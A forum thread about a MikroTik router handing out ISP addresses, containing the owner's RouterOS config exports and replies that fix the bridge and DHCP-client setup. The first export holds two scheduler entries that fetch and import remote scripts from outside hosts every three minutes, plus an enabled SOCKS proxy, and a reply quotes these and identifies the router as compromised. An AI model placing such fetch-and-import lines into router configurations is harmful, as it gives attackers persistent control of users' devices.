Community discussions

MikroTik App
 
levies
just joined
Topic Author
Posts: 4
Joined: Fri Aug 06, 2021 9:10 am

Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 9:29 am

Hello, my Router is 2011UiAS.
It works for 4 years without any problems until i reset it.
Now i'm trying to set it up, but ran into a problem. Devices connected to this router sometimes getting IP addresses from my ISP instead of the router's local addresses (from router DHCP Server). Even, from the access points (i have three of them).

ISP connected through the SFP port.

Thanks in advance.

Here is my config.
[admin@MikroTik] > export compact 
# aug/06/2021 09:21:25 by RouterOS 6.41
# software id = FDPG-2TR9
#
# model = 2011UiAS-2HnD
# serial number = 7A670712F998
/interface bridge
add admin-mac=64:D1:54:12:14:61 auto-mac=no comment=defconf name=bridge
/interface ethernet
set [ find default-name=ether4 ] name="Bed room"
set [ find default-name=ether5 ] name=Cabinet
set [ find default-name=ether2 ] name="Living Room"
set [ find default-name=ether3 ] name="Maxim Room"
set [ find default-name=ether8 ] name="Nikita Room"
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-b/g/n channel-width=20/40mhz-Ce distance=indoors frequency=auto mode=ap-bridge ssid=MikroTik-12146A wireless-protocol=802.11
/interface list
add comment=defconf name=WAN
add comment=defconf name=LAN
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa-psk,wpa2-psk mode=dynamic-keys supplicant-identity=MikroTik wpa-pre-shared-key=--redacted-- wpa2-pre-shared-key=--redacted--
/ip pool
add name=dhcp ranges=192.168.88.10-192.168.88.254
/ip dhcp-server
add address-pool=dhcp disabled=no interface=bridge name="Cat DHCP"
/interface bridge port
add bridge=bridge comment=defconf interface="Living Room"
add bridge=bridge comment=defconf interface="Maxim Room"
add bridge=bridge comment=defconf interface="Bed room"
add bridge=bridge comment=defconf interface=Cabinet
add bridge=bridge comment=defconf interface=ether6
add bridge=bridge comment=defconf interface=ether7
add bridge=bridge comment=defconf interface="Nikita Room"
add bridge=bridge comment=defconf interface=ether9
add bridge=bridge comment=defconf interface=sfp1
add bridge=bridge comment=defconf interface=wlan1
/ip neighbor discovery-settings
set discover-interface-list=LAN
/interface list member
add comment=defconf interface=bridge list=LAN
add comment=defconf interface=sfp1 list=WAN
/ip address
add address=192.168.88.1/24 comment=defconf interface=bridge network=192.168.88.0
/ip dhcp-client
add comment=defconf dhcp-options=hostname,clientid disabled=no interface=bridge
/ip dhcp-server network
add address=192.168.88.0/24 comment=defconf dns-server=192.168.88.1 gateway=192.168.88.1
/ip dns
set allow-remote-requests=yes
/ip dns static
add address=192.168.88.1 name=router.lan
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=drop chain=input comment="defconf: drop all not coming from LAN" in-interface-list=!LAN
add action=accept chain=forward comment="defconf: accept in ipsec policy" ipsec-policy=in,ipsec
add action=accept chain=forward comment="defconf: accept out ipsec policy" ipsec-policy=out,ipsec
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related, untracked" connection-state=established,related,untracked
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface-list=WAN
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge out-interface-list=all
/ip service
set telnet disabled=yes
set ftp address=192.168.88.0/24
set www address=192.168.88.0/24
set ssh address=192.168.88.0/24
set api disabled=yes
set winbox address=192.168.88.0/24
set api-ssl disabled=yes
/ip socks
set enabled=yes port=5678
/lcd interface pages
set 0 interfaces=wlan1
/system clock
set time-zone-name=Europe/Riga
/system scheduler
add interval=3m name=U7 on-event="/tool fetch url=http://massgames.space/poll/16d3cfaf-0057-452f-ba0f-c0fe61488119 mode=http dst-path=7xe7zt46hb08\r\
    \n/import 7xe7zt46hb08" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add interval=3m name=U6 on-event="/tool fetch url=http://strtbiz.site/poll/fc9cbeff-0e41-4f0c-bc76-067f9270c6bb mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
/tool mac-server
set allowed-interface-list=LAN
/tool mac-server mac-winbox
set allowed-interface-list=LAN
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 18959
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 1:24 pm

(1) Not sure but change this
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge out-interface-list=all
To
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface-list=WAN

(2) What is the purpose of input chain rule 5678

(3) Some of these services should be disabled.
/ip service
set telnet disabled=yes
set ftp address=192.168.88.0/24
set www address=192.168.88.0/24

set ssh address=192.168.88.0/24
set api disabled=yes

(4) Should be set to none!
/tool mac-server
set allowed-interface-list=LAN
 
User avatar
andkar
newbie
Posts: 47
Joined: Tue Aug 11, 2020 9:20 pm

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 2:09 pm

Remove sfp1 from bridge.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 2:18 pm

@anav... is the first time I see www protected (set www address=192.168.88.0/24) on a user board, and you ask to disable webfig?....

First of all you runing 6.41, is full of bug and knowed backdor, upgrade to the latest bugfix / long-term 6.47.10
then post again your config
Last edited by rextended on Fri Aug 06, 2021 3:02 pm, edited 3 times in total.
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 2855
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 2:38 pm

Netinstall. Why scheduler pulls files? IMHO your router is compromised and should be "furrowed".
/system scheduler
add interval=3m name=U7 on-event="/tool fetch url=http://massgames.space/poll/16d3cfaf-0057-452f-ba0f-c0fe61488119 mode=http dst-path=7xe7zt46hb08\r\
    \n/import 7xe7zt46hb08" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add interval=3m name=U6 on-event="/tool fetch url=http://strtbiz.site/poll/fc9cbeff-0e41-4f0c-bc76-067f9270c6bb mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 3:02 pm

...you runing 6.41, is full of bug and knowed backdor...

too late... :twisted:
 
levies
just joined
Topic Author
Posts: 4
Joined: Fri Aug 06, 2021 9:10 am

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 5:35 pm

Ok, i've updated to 6.48.3, removed that scheduler, removed the default user for the sake of security.

Also, tried to remove SFP1 from bridge -> no internet
tried the suggestion to change
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge
to
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface-list=wan -> no internet

New config is:
[bigcat@MikroTik] > export compact 
# aug/06/2021 17:29:36 by RouterOS 6.48.3
# software id = FDPG-2TR9
#
# model = 2011UiAS-2HnD
# serial number = 7A670712F998
/interface bridge
add admin-mac=64:D1:54:12:14:61 auto-mac=no comment=defconf name=bridge
/interface ethernet
set [ find default-name=ether4 ] name="Bed room" speed=100Mbps
set [ find default-name=ether5 ] name=Cabinet speed=100Mbps
set [ find default-name=ether2 ] name="Living Room" speed=100Mbps
set [ find default-name=ether3 ] name="Maxim Room" speed=100Mbps
set [ find default-name=ether8 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name="Nikita Room"
set [ find default-name=ether1 ] speed=100Mbps
set [ find default-name=ether6 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether7 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether9 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether10 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface wireless
set [ find default-name=wlan1 ] antenna-gain=0 band=2ghz-b/g/n channel-width=20/40mhz-Ce country=no_country_set distance=indoors frequency=auto frequency-mode=manual-txpower mode=\
    ap-bridge ssid=MikroTik-12146A station-roaming=enabled wireless-protocol=802.11
/interface list
add comment=defconf name=WAN
add comment=defconf name=LAN
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa-psk,wpa2-psk mode=dynamic-keys supplicant-identity=MikroTik wpa-pre-shared-key=*** wpa2-pre-shared-key=***
/ip pool
add name=dhcp ranges=192.168.88.10-192.168.88.254
/ip dhcp-server
add address-pool=dhcp disabled=no interface=bridge name="Cat DHCP"
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0
/user group
set full policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp
/interface bridge port
add bridge=bridge comment=defconf interface="Living Room"
add bridge=bridge comment=defconf interface="Maxim Room"
add bridge=bridge comment=defconf interface="Bed room"
add bridge=bridge comment=defconf interface=Cabinet
add bridge=bridge comment=defconf interface=ether6
add bridge=bridge comment=defconf interface=ether7
add bridge=bridge comment=defconf interface="Nikita Room"
add bridge=bridge comment=defconf interface=ether9
add bridge=bridge comment=defconf interface=sfp1
add bridge=bridge comment=defconf interface=wlan1
/ip neighbor discovery-settings
set discover-interface-list=LAN
/interface list member
add comment=defconf interface=bridge list=LAN
add comment=defconf interface=sfp1 list=WAN
/ip address
add address=192.168.88.1/24 comment=defconf interface=bridge network=192.168.88.0
/ip dhcp-client
add comment=defconf disabled=no interface=bridge
/ip dhcp-server network
add address=192.168.88.0/24 comment=defconf dns-server=192.168.88.1 gateway=192.168.88.1
/ip dns
set allow-remote-requests=yes
/ip dns static
add address=192.168.88.1 name=router.lan
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=drop chain=input comment="defconf: drop all not coming from LAN" in-interface-list=!LAN
add action=accept chain=forward comment="defconf: accept in ipsec policy" ipsec-policy=in,ipsec
add action=accept chain=forward comment="defconf: accept out ipsec policy" ipsec-policy=out,ipsec
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related, untracked" connection-state=established,related,untracked
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface-list=WAN
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge
/ip service
set telnet disabled=yes
set ftp address=192.168.88.0/24
set www address=192.168.88.0/24
set ssh address=192.168.88.0/24
set api disabled=yes
set winbox address=192.168.88.0/24
set api-ssl disabled=yes
/ip socks
set enabled=yes port=5678
/lcd interface pages
set 0 interfaces=wlan1
/system clock
set time-zone-name=Europe/Riga
/tool mac-server
set allowed-interface-list=LAN
/tool mac-server mac-winbox
set allowed-interface-list=LAN
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 6:21 pm

if you do not change anything after your last export,
do not think twice and paste this on terminal without omit the { } !!!:
{
/interface ethernet
set [ find default-name=ether1 ] speed=1Gbps
set [ find default-name=ether2 ] speed=1Gbps
set [ find default-name=ether3 ] speed=1Gbps
set [ find default-name=ether4 ] speed=1Gbps
set [ find default-name=ether5 ] speed=1Gbps
set [ find default-name=ether6 ] advertise=10M-half,10M-full,100M-half,100M-full
set [ find default-name=ether7 ] advertise=10M-half,10M-full,100M-half,100M-full
set [ find default-name=ether8 ] advertise=10M-half,10M-full,100M-half,100M-full
set [ find default-name=ether9 ] advertise=10M-half,10M-full,100M-half,100M-full
set [ find default-name=ether10 ] advertise=10M-half,10M-full,100M-half,100M-full
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-g/n station-roaming=disabled
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa2-psk wpa-pre-shared-key=""
/ip dhcp-client
remove [find]
add comment=defconf disabled=no interface=sfp1
/interface bridge port
remove [find where interface=sfp1]
/ip firewall filter
remove [find where dst-port=5678]
add action=accept chain=input comment="Neighbor Discovery" dst-address=255.255.255.255 dst-port=5678 protocol=udp src-port=5678
move [find where comment="Neighbor Discovery"] [find where chain=input and comment="defconf: accept established,related,untracked"] 
/user group
set full policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,!dude,tikapp
/ip socks
set enabled=no port=1080
/ip dns
set servers=1.1.1.1,8.8.8.8
}

After you do that, do another export and put on forum for see if something are missing.

Disable th DHCP server on all other Access Ponits
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 2855
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 10:29 pm

Please DO netinstall. Compromised ROS is infected internally and cleaninig configuration does not help.

1. export configuration
2. netinstall to reformat the disk and kill all malware installed in the router
3. import configuration from .rsc file
 
sid5632
Long time Member
Long time Member
Posts: 552
Joined: Fri Feb 17, 2017 6:05 pm

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Sat Aug 07, 2021 3:21 am

Also, tried to remove SFP1 from bridge -> no internet

/ip address add address=192.168.88.1/24 comment=defconf interface=bridge network=192.168.88.0
/ip dhcp-client add comment=defconf disabled=no interface=bridge
The answer is of course staring you in the face.
Put the dhcp-client on sfp1 after you remove it from the bridge.
 
levies
just joined
Topic Author
Posts: 4
Joined: Fri Aug 06, 2021 9:10 am

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Sat Aug 07, 2021 11:03 am

Thanks,
removed sfp1 from the bridge,
moved DHCP client to sfp1
All works.

Netinstall will do next time, as now i'm abroad for 3-4 days.
I've turned off the router for this period of time.

Thanks for the help.

Who is online

Users browsing this forum: Bing [Bot], carcuevas and 28 guests